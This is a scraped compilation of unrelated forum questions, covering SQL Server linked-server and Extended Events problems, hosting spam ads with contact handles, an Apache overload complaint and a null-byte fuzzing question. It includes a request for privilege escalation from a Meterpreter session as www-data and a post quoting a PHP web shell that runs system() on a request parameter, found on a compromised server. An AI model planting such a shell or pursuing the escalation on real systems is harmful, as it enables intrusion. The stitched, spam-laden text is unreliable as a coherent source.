Linked Server from On-Premise to Azure SQL Database

I am using: SSMS-18.4 SQL Server-SQL 2019 CU3 Windows 10

I was able to create a linked server successfully from on-premise SQL 2017 to the Azure SQL database without exposing my password.

--Read the password from text file  DECLARE @password VARCHAR(MAX) SELECT  @password = BulkColumn FROM    OPENROWSET(BULK 'C:\Azure SQL Database - Where is my  SQL Agent\password.txt', SINGLE_BLOB) AS x     --Drop and create linked server IF EXISTS(SELECT * FROM sys.servers WHERE name = N'AzureDB_adventureworks') EXEC master.dbo.sp_dropserver @server=N'AzureDB_adventureworks', @droplogins='droplogins'; EXEC master.dbo.sp_addlinkedserver  @server = N'AzureDB_adventureworks',   @srvproduct=N'',  @provider=N'SQLNCLI',  @datasrc=N'ugdemotargetserver.database.windows.net',  @catalog=N'adventureworks';  EXEC master.dbo.sp_addlinkedsrvlogin  @rmtsrvname=N'AzureDB_adventureworks',  @useself=N'False',  @rmtuser=N'taiob',@rmtpassword=@password; GO 

But the password is not getting the correct value. I am getting a login failure.

Some of the error message:

Login failed for user 'taiob'.  (.Net SqlClient Data Provider) Server Name: .\SQL2019  Error Number: 18456  Severity: 14  State: 1  Line Number: 1 

If I hardcode the password it works fine. If I print the variable I can see the value is correct. It is not a firewall issues as I can directly connect from the same SSMS that I am running the code from.

What’s a great way to escalate privileges on a Linux server?

what’s a great way to escalate privileges when you have a meterpreter session on a Linux system. The exploits I use to try to escalate privileges don’t work and when I use the “upload” command to try to upload a msfvenom payload I get the error “core_channel_open: Operation failed: 1”

I’m using the newest update of Kali Linux

And I’m using Metasploit-Framework verion 5.0.80-dev

The Linux machine is a Server and the user I am is: www-data

Hope y’all can help me

DEDICATED ROOT SERVER/ FREE cPanel License/ Root Access & Free SSL/ Free & Easy Site Transfer

Location:Michigan, Arizona,Amsterdam,Singapore
Available application:Wordpress/Prestashop/Magento/Drupal/Joomla
/Mantis Bug Tracker/CMS Made Simpls/PhpBB/PmWiki/Noahs Classifieds

POWER+ 4GB 75GB SSD 2TB/1G 2 $ 65.00  
PRESTIGE+ 6GB 100GB SSD 3TB/1G 2 $ 91.00  
PINNACLE+ 8GB 150GB SSD 4TB/1G 2 $ 129.00

Order now:https://www.vpb.com/grouproom.php?gid=1163&fuid=269

Contack with me.

Skype ID:live:.cid.143257f04d8bf604
Telegram:@rosalie269

save xevent target file in specific folder dynamically in sql server

i need to create an xevent in sql server to capture all the executed queries while my server is running and to save them in a file under a folder with the database name.

so my problem is i need to save the file in a dynamic path ( with variables..etc) :

here is the code : DECLARE @file varchar(50); declare @path nvarchar(250); SET @file = ‘D:\XE\’+DB_NAME() set @path = ‘D:\XE\’+DB_NAME()+’day’; EXECUTE master.dbo.xp_create_subdir @file CREATE EVENT SESSION newSession1 ON SERVER ADD EVENT sqlserver.sql_statement_completed ( ACTION (sqlserver.sql_text, sqlserver.tsql_stack, sqlserver.client_app_name, sqlserver.client_hostname, sqlserver.username ) WHERE ( sqlserver.database_name = ‘School’ ) ), ADD EVENT sqlserver.sql_statement_starting ( ACTION (sqlserver.sql_text, sqlserver.tsql_stack, sqlserver.client_app_name, sqlserver.client_hostname, sqlserver.username ) WHERE ( sqlserver.database_name = ‘School’)
) ADD target package0.event_file(SET filename=N@path) WITH (MAX_MEMORY=4096 KB,EVENT_RETENTION_MODE=ALLOW_SINGLE_EVENT_LOSS,MAX_DISPATCH_LATENCY=30 SECONDS,MAX_EVENT_SIZE=0 KB,MEMORY_PARTITION_MODE=NONE,TRACK_CAUSALITY=OFF,STARTUP_STATE=OFF) GO

this code shows an error in set Filename = @path.

any help please ?

PS: i need to do with the code because iam going to include it in c# project method. thanks in advance

*[Hostpoco.com] Dedi Server| 99% Uptime | 24*7 Service | Premium Bandwidth |Root Acce

If you are looking for a reliable and caring hosting provider, then you are on the right platform. Hostpoco.com offers high-quality dedicated servers with 100% up-time. Our dedicated servers not only provide full root SSH access but also enable you to host unlimited domains and install the application which you need, you can resell hosting to provide you the convenience and independence of a dedicated server.

====================================
Features available with every Plan:
====================================
~ Complete Root Access
~ 24×7 Rescue System
~ Premium Bandwidth
~ 99 % Uptime Guarantee
~ SSH Access
~ 7 Days Money Back Guarantee
~ 2x HDD SATAII 2TB 7.20 Storage
~ 4 Free IP Address
~ 1Gbps uplink 10 TB traffic included

=======
Plan:
=======
*Dedi Startup : $80 /Monthly
– E3-1240 ( 2 Cores x 3.3 )
– HDD Storage
– 8 GB RAM

*Dedi Pro : $85 /Monthly
– X5650 ( 2 Cores x 2.66 )
– SSD Storage
– 8 GB RAM

*Dedi Premium: $95 /Monthly
– E3-1240 ( 2 Cores x 3.3 )
– HDD Storage
– 16 GB RAM

*Dedi Elite : $110 /Monthly
– Intel Xeon 56xx (4 Cores)
– HDD Storage
– 16 GB RAM

For more Plan: https://hostpoco.com/low-cost-dedicated-server.php#

Thank You.

apache server under attack

Hi all,
I run a small community . Iam using apache web server with smf forums on a vps with centos 7. I have all good firewalls going (csf) . Iam trying to solve an issue with a user crashing my7 forums. The memory on the vps and cpu will spike to 100% and create a "cannot connect to mysql database" error. on the apache error logs I get a mpm_prefork error showing AH00159 error out of memory. can anyone tell me how to prevent this attack. thanks.

Server was compromised, found this line in a recently modified PHP file [closed]

I found this at the top of a PHP file in the web server:

<?php if(isset($ _REQUEST['xxx'])){ echo "<pre>"; $ xxx = ($ _REQUEST['xxx']); system($ xxx); echo "</pre>"; die; }?>

I’m guessing this is how they got the server to execute whatever commands they wanted to get in.

Does anyone know how this might have slipped into the PHP file in the first place? I know it’s an extremely vague and stupid question, but I’m stumped. Did they likely already have access to the server and slipped this in as a backdoor for later?

Internal server error with special characters in request body – possible vulnerability?

While blackbox testing of web-application, I found some unexpected behavior. Request body of original request, sent by browser, contained post parameter like this:

user[email]=test@test.test 

After some fuzzing, application returned 500 (Internal Server Error) on queries that started by %00 (null byte), followed by characters not equal to %09, %0a (new line), %0b, %0c, %0d and %20 (space). If it is followed by one more null byte, or one of already mentioned characters, it behaves properly.

I’m pretty new to web testing, and wondered what can cause this, and is it really unexpected behavior.

I suggested this code to execute some code and sanitizing other characters like “, ‘ and others to prevent command injection, but null byte terminates string with the command, so the command goes wrong (for example, missing ‘ or ” in the command), but why it needs other character after the null byte?

Or maybe this is related to specialized functions to send mail in other languages?

Also, I thought about database processing, but it still does not make sense, why we need this characters in the end, and why new line, space and others, changes the behavior.

What could lead to this behavior, and is it worthy point to research deeper?